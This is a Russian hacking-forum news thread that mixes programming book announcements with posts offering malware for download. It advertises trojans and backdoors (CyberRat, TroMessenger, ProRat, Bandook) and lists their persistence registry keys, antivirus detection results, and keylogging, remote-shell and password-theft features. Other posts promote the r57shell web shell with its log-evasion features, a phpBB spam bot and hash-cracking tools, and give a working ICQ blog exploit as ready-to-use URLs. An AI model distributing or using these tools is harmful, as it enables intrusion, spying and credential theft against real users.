Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Библия Delphi + CD
bibl_delph.jpg

Еще 1 книженция бай Фленов.
Цель книги - научить читателя строить логику программы и алгоритмы различных вычислений. Уметь программировать еще не достаточно, надо знать, как применять полученные знания на практике. Для этого подробно описывается логика выполнения каждого участка кода, чтобы читатель смог использовать эти знания при решении собственных задач.

Книга содержит большое количество примеров практического программирования, некоторые из них вынесены в качестве дополнительной информации на прилагаемый компакт-диск. Автор собрал все замечания и предложения по дополнению книги и написал совершенно новый вариант, который вы сейчас держите в руках. Таким образом, книга прошла массовое тестирование и теперь отражает потребности множества как начинающих, так и опытных программистов.
[New$paN]
 
3D Studio Max 7.0 не для дилетантов
1143067885_1143059864_3d_studio_max.gif

3D Studio MAX 7.0 - профессиональный пакет трехмерной анимации для Windows NT, созданная фирмой Autodesk параллельно с 3D Studio. Программа обладает модуленезависимым интерактивным объектно-ориентированным интерфейсом, реализует расширенные возможности создания и управления анимацией, хранит историю жизни каждого объекта и позволяет создавать разнообразные световые эффекты, поддерживает 3D-акселераторы и имеет открытую архитектуру. Проще говоря, с его помощью можно создавать очень сложные объекты, затем анимировать сцены. 3D Studio MAX 7.0 - лидер рынка программного обеспечения для трехмерного моделирования, анимации и визуализации. Новая версия 3D Studio MAX 7.0 предлагает еще больше усовершенствованных возможностей, которые удовлетворяют возрастающим нуждам создателей трехмерных моделей и аниматоров, а также разработчикам интерактивных игр.[New$paN]
В разработке этой версии участвовали многие известные разработчики игр, например, Sega. По некоторым данным, пакет 3D Studio Max 7.0 используют 80% разработчиков, связанных с игровой индустрией. Интересным новшеством является режим Vehicle Dynamics, который позволяет, задав основные параметры колесного транспортного средства, обращаться с ним как с простым объектом. В состав пакета также вошла дополнительная программа для рендеринга Mental Ray 3.2, лицензированная у Mental Images. Более того, с помощью 3D Studio MAX SDK можно даже создавать свои собственные приложения-модули, чтобы придавать оригинальный вид своим творениям. В этой книге описаны особенности последней версии 3D Studio MAX. Издание окажется одинаково полезным как для новичков, так и для профессионалов - словом, для всех, кто заинтересован в познании всех возможностей 3D Studio MAX 7.0. Начинающие пользователи найдут в нем подробное описание основных средств и приемов выполнения всех этапов работы над анимацией - от создания геометрических моделей объектов и настройки источников света до применения графических эффектов на этапе видеомонтажа. Искушенные специалисты по 3D Studio MAX предыдущих версий смогут почерпнуть сведения об особенностях последней версии этой программы, таких как настраиваемый интерфейс, окно просмотра структуры и целый ряд других новинок.
:zns5: Скачать|Download - 10 метроф
 
Advanced HostMonitor v.5.92
hostmonitor.png

Обновилась программа Advanced HostMonitor, осуществляющая постоянный мониторинг доступности и быстродействия серверов. В случае ошибок и сбоев в работе сервера, HostMonitor предупреждает администратора (или же пытается исправить проблему самостоятельно). В программе используются 55 методов тестирования, присутствует большое количество настроек. Кроме того, HostMonitor позволяет создавать детализированные логи в различных форматах (Text, HTML, DBF и ODBC), имеется встроенный редактор отчетов, удобный и понятный интерфейс и т.д.[New$paN]

:zns5: Скачать|Download
:zns1: Страница на кряк
pass на архив:
www.2baksa.net
 
Бот, посылающий SMS
В сети появился ICQ бот, который шлет СМСки более чем на 80 операторов России, Польши, Украины и др. братских народов))

Формат сообщения:
!sms [номер в международном формате] [текст]

Характеристики:
• Не больше 20 сообщений на номер телефона в сутки.
• Время отклика 10-15 секунд после отправки смс (отправлено или нет).
• Время доставки - вечером, ночью и утром: 1-3 мин, днём от 5-25 мин (смотря как загружен оператор).

Номера бота далее[New$paN]:
232751971, 340783220, 273659333
 
Теперь рейтинг видно всем!
С радостью сообщем Вам, что Ваш рейтинг и причины его понижения/повышения видны всем. Вы можете посмотреть уровень рейтинга (в любой теме или в профиле) и поглядеть за что был установлен + или -.
Обо всех глюках в эту тему.[New$paN]
 
Cкрипт для спама форумов phpBB
Cкрипт для рассылки (спама) на форумы phpBB, написан на php.
Автор - pixcher. Возможности:

- Скрипт регистрирует нового пользователя на форуме, логинится, и оставляет пост
- При остсутствии определённого логина и e-mail скрипт генерирует их сам по лексическим правилам
- При регистрации нового пользователя скрипт добавляет вашу подпись.
(в подписи можно вписать url вашего сайта, что сильно повысит его ИЦ и PR у поисковиков)
- Скрипт определяет номера активных топиков, и добавляет пост в последний из них (так как на большинстве форумов последний топик имеет название "Купля\Продажа" или "Флейм", что уменьшает вероятность того,
что топик сразу же будет удалён)
- При удачном посте, скрипт заносит форум в новыю БД ( исключая повторения записей ).То есть скрипт является чекером баз форумов.
- В комплекте есть скрипт, который собирает списки форумов через google[New$paN]

Источник: exploit.in
 
Программа PasswordsPro обновилась до версии 2.1.0.0.
В новой версии:
1. Инструмент "Восстановление паролей к хэшам":
  • Добавлена поддержка нового типа хэшей - "MySQL5", который используется в MySQL версий 4.1 и 5.
  • Добавлен новый вид атаки - предварительная атака, которая позволяет восстанавливать простые пароли типа "123", "qwerty", "sssss" и т.д.
    [New$paN]
  • Добавлен новый вид атаки по словарям - комбинированная атака, позволяющая восстанавливать пароли, состоящие из двух и более слов - "admin1980", "admin-admin", "megaadmin" и др.
    Примечание: данный вид атаки в Demo-версии недоступен.
  • Добавлен новый вид атаки - атака по предварительно рассчитанным Rainbow-таблицам.
    Поддерживаются таблицы для следующих типов хэшей - MD4, MD5, SHA-1.
    При этом есть возможность создавать до 8 различных наборов Rainbow-таблиц.
    Примечание: данный вид атаки в Demo-версии недоступен.
  • Добавлена возможность создавать до 8 различных наборов словарей, используемых в атаках по словарям.
  • Введено разделение атаки по словарям на 3 разных вида - "Простая", "Комбинированная" и "Гибридная".
  • Скорость восстановления хэшей типа "md5(md5($salt).md5($pass))
    PHP:
    " увеличена в 2,5 раза.[/list][u]2. Инструмент "Хранитель паролей":[/u][list][*]Добавлена возможность переключения между текстовыми полями, используя клавишу "TAB" (при этом в поле "Комментарий" символ табуляции можно вставлять, используя стандартную комбинацию клавиш Shift+TAB).[*]Добавлены новые сервисные функции: генерация случайного пароля (с настройками из инструмента "Генератор паролей") и переход по ссылке, указанной в поле "Адрес".[*]Появилась возможность создавать резервную копию базы данных с паролями перед ее открытием.[/list]
 
r57shell 1.3 released
в новой версии:
~ переписаны функции работы с базами данных
~ добавлена возможность указывать адрес сервера при работе с базами данных
~ удалены функции вывода структуры базы данных с целью уменьшения размера скрипта
~ добавлена функция обхода логирования в MySQL и запросы выполненные скриптом не отображаются в логах данного sql сервера
~ при редактировании файлов время последнего изменения файла (modify-time) не изменяется
[New$paN]
~ исправлена ошибка с переводом каретки при редактировании файлов в unix
~ добавлена проверка возможности обхода ограничений safe_mode через использование функции mb_send_mail
~ добавлена проверка возможности обхода ограничений safe_mode, просмотр листинга директорий с использованием imap_list
~ добавлена проверка возможности обхода ограничений safe_mode, просмотр содержимого файла с использованием imap_body
~ логин и пароль для доступа к скрипту шифруются с помощью md5

:zns5: Скачать|Download
 
Trojan CyberRat 1.7
bomb1on.png

К сожалению палиться:
AntiVir 6.34.0.14 03.30.2006 no virus found
Avast 4.6.695.0 03.29.2006 no virus found
AVG 386 03.29.2006 no virus found
Avira 6.34.0.54 03.29.2006 no virus found
BitDefender 7.2 03.30.2006 no virus found
CAT-QuickHeal 8.00 03.29.2006 no virus found
ClamAV devel-20060202 03.29.2006 no virus found
DrWeb 4.33 03.29.2006 Trojan.PWS.Penguin
eTrust-InoculateIT 23.71.115 03.30.2006 no virus found
eTrust-Vet 12.4.2144 03.30.2006 no virus found
Ewido 3.5 03.29.2006 no virus found
Fortinet 2.71.0.0 03.30.2006 no virus found
F-Prot 3.16c 03.28.2006 no virus found
Ikarus 0.2.59.0 03.30.2006 no virus found
Kaspersky 4.0.2.24 03.30.2006 no virus found
McAfee 4729 03.29.2006 New Malware.b
NOD32v2 1.1461 03.29.2006 a variant of Win32/DarkMoon.BO
Norman 5.70.10 03.29.2006 no virus found
Panda 9.0.0.4 03.29.2006 Suspicious file
Sophos 4.04.0 03.30.2006 no virus found
Symantec 8.0 03.30.2006 no virus found
TheHacker 5.9.7.122 03.30.2006 no virus found
UNA 1.83 03.23.2006 no virus found
VBA32 3.10.5 03.29.2006 Trojan.PWS.Penguin

Server:
после установки появляються следующие файлы:
c:\WINDOWS\win32log.dat Size: 263 bytes
c:\WINDOWS\@@@\mydll.dll Size: 233,472 bytes
c:\WINDOWS\@@@\PID.dat Size: 4 bytes
c:\WINDOWS\@@@\WIN32.EXE Size: 343,308 bytes

реестр:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "@@@"
data: C:\WINDOWS\@@@\WIN32.EXE

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "@@@"
data: C:\WINDOWS\@@@\WIN32.EXE

тестировалась на XP

написана на Delphi упакована UPX

Небольше описание от авторов на английском можно найти в архиве вместе с троем.

:zns5: Скачать|Download
 
Короче говоря ситтуация критическая. Нас прут с хостинга и если быстро не найти нормальную альтернативу - мы закроемся.
Ситтуация такая: к хостеру приехали из ФСБ, арестовали винты. Слава богу бэкап был. Существовать нам не более 2 дней.
Тем кто может дать временный хост - в асю (11177222). Также нужен абузостойкий сервак на постоянной основе.
Напомню, если завтра хоста не будет - хана проекту.
[mod][Winux:] Всех с 1 апреля, всем спасибо[/mod]
[New$paN]
 
xakepy.ru ez!n3 issue 1
Содержание:

• Интродакшн
• FAQ about HACK v1.5
• Вся правда о вбиве
• Windrop
• Оутпост - зомби
• Накрутка
• Набор начинающего proxy-грабера
• Понимание эффекта и причин уязвимостей типа cross-site scritpting
• Основы SQL
• Алгоритм хэширования MD5
• Принципы и практическая реализация DDoS атак
• Кардинг: пошаговое руководство по работе в партнерке
• Шкодим на либвискере
• 0utr0[New$paN]

:zns5: Скачать|Download - официальное зеркало
:zns5: Скачать|Download - наше зеркало
 
CodePimps e-zine issue #8
В свежем номере:

0x00 Intro
0x01 Scene Short Newz
0x02 Newz Review
0x03 e-Zine Review
0x04 Release Review
0x05 TrojanDownloader by jecxz
0x06 Small Things About Outpost by jecxz
0x07 D3D: Графический конвейер и архитектура Direct3D by Zool
0x08 CodePimps e-Zine Distribution
0x09 CodePimps e-Zine Writerz[New$paN]

:zns5: Скачать|Download
:zns5: Скачать|Download - наше зеркало
 
Invision Gallery - просмотр файлов
Недавно был взломан damagelab. Как? Бага досадная. В этом мане by ZaCo все просто и понятно.
Тема: просмотр конфига
Направление: Web
Уровень: простой
Как дефейсили damagelab? Второе видео по взлому нас)
З.Ы.: бага прикрыта - можно не пытаться))
 
TroMessenger 1.1
:screenshot: Скриншот|Screenshot

Неплохой трой, работающий на Yhoo протоколе, тоесть все управление осуществляется через yahoo.
От Вас потребуется вбить акк на Yahoo для бота и акк админа, с которого будет осуществляться управление.
Можно поставить пасс, чтобы иметь жертву с другого ID.[New$paN]
Основные функции, думаю переводить не стоит:
/Help - Displays the list of available commands in this version of TroMessenger. maybe news commands be added in next versions. so you will know them by using this command.

/screenshot - Shows you a screenshot from the Remote PC.
Question - Yahoo! Messenger is a Text-Based program, but how TroMessenger can show me a picture ?
Answer - TroMessenger shows you the picture indirectly. that means: it takes the screenshot, and uploads it to the host, and gives you the link to the taken picture.

/download - Downloads a file from web and saves it in the specified location at the Remote PC. You will be notified by finishing the download.
Syntax: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Note: You must use Quote Marks ("). If you forgot to put quotes, download will not work.

/restart - Restarts the Windows in the Remote PC.
Warning: If you test it on your PC, you will be restarted without any question or confirmation. and any changes in your programs will be lost. so care about using this command. also Shutdown command.

/shutdown - Turns Off the Remote PC. (The warning repeated)

/time , /date - Shows the DateTime.

/ejectcd - Ejects the CD-ROM Drive.

/closecd - Closes the door of CD-ROM Drive after ejection.

/view - For showing content of Text Files. Note: if the text is longer than ... bytes, it will be divided to several pieces and they will be sent one after one.

/getfile - uploads a specified file to host and gives you the link. This is used for downloading binary (non-text) files from remote pc.

/status , /idle , /busy - Sets the Status Message of the Robot to what you want. Plus using Busy and Idle Icons beside ID.
Example Syntaxes:
/status Now I'm ready.
/idle I'm away from PC.
/busy Currently Busy.

/cancel - Cancels the current executing job. For example you decided to view a 1MB text file. and the text is being sent to you piece by piece, but you suddenly decide to cancel the operation and not to send the remaining pieces of text. Just use a /cancel command.

/login - For logging in of non-admin users. Everytime TroMessenger starts, if you are not the predefined Admin of Robot, but you know the password, you should use /login your password to begin using program. Don't use quote marks for your password.

:zns5: Скачать|Download
 
Visual Basic Windows API Programming
Весьма неплохой справочник по WinAPI для Visual Basic.
Искал для себя. Многие знают, что для меня API больная тема, вот и пригодилось.
Хоть книга и на английском, но там полно полезной инфы, справочник разложен по алфавиту, есть готовые декларации функций. Вообщем качаем, всего 1.5 метра.[New$paN]

:zns5: Скачать|Download
 
ProRat v1.9 Fix2 public
Вышел паблик-релиз ProRat v1.9. Это весьма неплохой трой - бэкдор с кучей функций. Комменты излишни.[New$paN]
Скачать с оффсайта:
:zns5: Скачать|Download

Скоро может залью на наш ФТП для надежности.
 
Bandook 1.3 by Princeali
bandook13es1pm.gif

написан на С++
впервые увидел свет в 09/17/2005
размер сервера ~18kb
Код:
c:\WINDOWS\system32\ali.exe
[New$paN]
ключики:
Код:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Bandook"
data: C:\WINDOWS\System32\ali.exe 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{B6A807N6-42DF-4W02-93E5-B156B3FA8AL1} "StubPath"
data: C:\WINDOWS\System32\ali.exe

Tech :
-------
*Firewall By Pass Plus Plus (++) , User level APIs Unhook / SDT Restore POC Method
*Persistance Option (File / Startup keys Rewritten on Deletion,Restarted on Process Termination ,Safe Mode Boot)
*Rootkit Option : Hide Process/Startup keys/and File / connection

Curent Features :
-------------------
*File Manager
*Registry Manager
*Folder Mirroring
*Screen Capture (JPEG / PNG)
*Cam Capture (JPEG / PNG)
*Mic Capture
*Windows Manager
*Ims Spy (MSN/YAHOO/AIM)
*Process Manager
*Protected Password Storage Viewer
*Instant Messenger Passwords Viewer
*Remote Shell
*Online/Offline keylogger
*HTTP Webserver
*Socks 4
*HTTP Proxy
*Port Redirection
*Download File from url
*Mass Download

тестировалось на Windows XP

:zns5: Скачать|Download 1.75MB
 
logo.gif

программа: ICQ blogs
описание:
Forall и AUR отыскали маленькую дырочку, с помощью которой можно было писать в любом блоге что угодно.От кого угодно. [New$paN]
Для постинга от лица хозяна номера:
Код:
http://www.icq.com/people/user_actions.php?action_type=1&message_type=2&uin_from=11111&uin_to=11111&message_title=hackedby&message_body=forall
(меняем 11111 на что-то своё)
И для созданий комментов от кого угодно:
Код:
http://www.icq.com/people/user_actions.php?action_type=2&message_type=2&return_dest=%2Fpeople%2Fabout_me.php%3Fuin%3D10000%26enf_wr%3D1&uin_from=336543024&uin_to=10000&message_title=Message+from+User&message_body=zloy.org
Заменяя 1000 (блог, в котором нужно что-то написать) и 336543024 (от кого пишем)

P.S.
Кто хочет, читайте надписи в аськах:
http://icq.com/people/about_me.php?uin=***
подставляя заместо "*" любой красивый номерок.
 
Статус
Закрыто для дальнейших ответов.
Верх